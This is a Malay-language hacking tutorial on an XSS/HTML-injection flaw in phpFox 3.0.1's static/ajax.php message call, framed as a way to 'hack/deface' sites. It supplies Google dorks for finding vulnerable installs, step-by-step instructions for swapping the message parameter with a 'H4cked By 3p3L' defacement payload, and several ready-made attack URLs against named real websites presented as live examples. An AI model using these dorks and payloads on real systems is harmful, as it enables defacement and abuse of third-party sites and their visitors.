PHP fox ( ajax.php) Verunability

PHP Fox ( ajax.php) XSS Verunability [ Hack / Deface ]

Bukak mana2 website yang ada text :© · English (US) Powered By phpFox Version 3.0.1

====================================================

Google Dork :
"intext:© · English (US) Powered By phpFox Version 3.0.1."
"inurl:/static/ajax.php?core"

====================================================

Bila buka tengok kat url atas akan jadi macam ni :

Contoh Target:

http://onlinesocial.in/

===========================================================
http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=<div class="error_message">some message here&core[security_token]=99d754d2b583565369e194e30eaabcbc

===========================================================
Perhatikan URl Kat atas tu.n bagi perhatian kat benda yang dihilight dengan warna merah.

ok..sekarang tukar perkataan yang kaler merah tu dengan desgin/url/apa2 yang nak guna.

Contoh saia guna desgin ini:

http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=150&width=300&message=

<center><fontcolor="red"><h2>H4cked By 3p3L</h2><br><h1>epelhijaw.blogspot.com</h1><ahref='http://epelhijaw.blogspot.com'><imgsrc="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg"/>

&core[security_token]=99d754d2b583565369e194e30eaabcbc

Perhatian. Teks yang keler kuning tu ialah desgin saia.

lpastu gabungkan manjadi 1 link :)

Live examples :

http://onlinesocial.in/static/ajax.php?core[ajax]=true&core[call]=core.message&height=400&width=700&message=%3Ccenter%3E%3Cfontcolor=%22red%22%3E%3Ch2%3EH4cked%20By%203p3L%3C/h2%3E%3Cbr%3E%3Ch1%3Eepelhijaw.blogspot.com%3C/h1%3E%3Cahref='http://epelhijaw.blogspot.com'%3E%3Cimgsrc=%22https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg%22/%3E&core[security_token]=99d754d2b583565369e194e30eaabcbc

http://www.marshable.net/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message= <center><fontcolor="red"><h2>H4cked By 3p3L</h2><br><h1>epelhijaw.blogspot.com</h1><ahref='http://epelhijaw.blogspot.com'><imgsrc="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg"/>



http://artisticdimeinc.com/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=<center><fontcolor="red"><h2>H4cked By 3p3L</h2><br><h1>epelhijaw.blogspot.com</h1><ahref='http://epelhijaw.blogspot.com'><imgsrc="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg"/>

http://mstudio84.com/gist/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=<center><fontcolor="red"><h2>H4cked By 3p3L</h2><br><h1>epelhijaw.blogspot.com</h1><ahref='http://epelhijaw.blogspot.com'><imgsrc="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg"/>


http://parsdb.ir/accessories/social_network/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=<center><fontcolor="red"><h2>H4cked By 3p3L</h2><br><h1>epelhijaw.blogspot.com</h1><ahref='http://epelhijaw.blogspot.com'><imgsrc="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg"/>


http://sohiran.ir/fb/static/ajax.php?core[ajax]=true&core[call]=core.message&core[security_token]=860eb6a699d5d9f375b5e8cf0021c094&height=150&message=<center><fontcolor="red"><h2>H4cked By 3p3L</h2><br><h1>epelhijaw.blogspot.com</h1><ahref='http://epelhijaw.blogspot.com'><imgsrc="https://fbcdn-sphotos-f-a.akamaihd.net/hphotos-ak-ash4/484225_3866063860272_744305190_n.jpg"/>

Ekeke :